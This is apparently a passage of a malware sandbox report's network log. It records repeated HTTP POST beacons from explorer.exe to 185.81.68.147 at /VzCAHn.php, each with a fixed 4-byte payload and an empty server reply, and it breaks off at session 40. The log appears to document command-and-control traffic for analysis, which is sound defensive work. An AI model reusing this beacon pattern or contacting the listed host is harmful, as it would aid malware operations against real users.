                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.1049833185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.663935900 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.784568071 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.326944113 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:31 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.2.1049839185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.554856062 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.677062988 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.187644005 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:33 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.1049845185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.429608107 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.549412012 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:35.927350998 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:35 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.1049851185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.163839102 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.285625935 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.620157957 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:36 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.1049852185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.851574898 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.971693993 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.545030117 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:38 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.1049858185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.772917986 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.892905951 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.371892929 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:40 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.1049865185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.601893902 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.722326040 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.055299997 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:42 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.1049871185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.308027029 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.428137064 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.747426033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:43 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.1049877185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.976136923 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:45.097040892 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.577703953 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:45 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.2.1049882185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.804791927 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.924904108 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.401683092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:47 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.1049884185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.648087978 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.768099070 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.251863003 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:49 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.1049890185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.476327896 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.704849958 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.088426113 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:51 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.1049895185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.320352077 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.440181971 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:53.930058956 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:52 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.2.1049901185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.163666964 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.284584045 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.762617111 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:54 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.2.1049907185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.991816044 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:56.112029076 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.592266083 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:56 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                35192.168.2.1049911185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.819811106 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.939786911 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.439554930 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:58 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.2.1049914185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.663523912 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.783324957 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.133392096 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:00 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                37192.168.2.1049920185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.367005110 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.487035990 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:02.968086958 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:02 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                38192.168.2.1049925185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.195141077 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.315094948 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.829879045 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:03 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                39192.168.2.1049927185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.088469028 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.208494902 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.616945028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:44:05 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.2.1049933185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
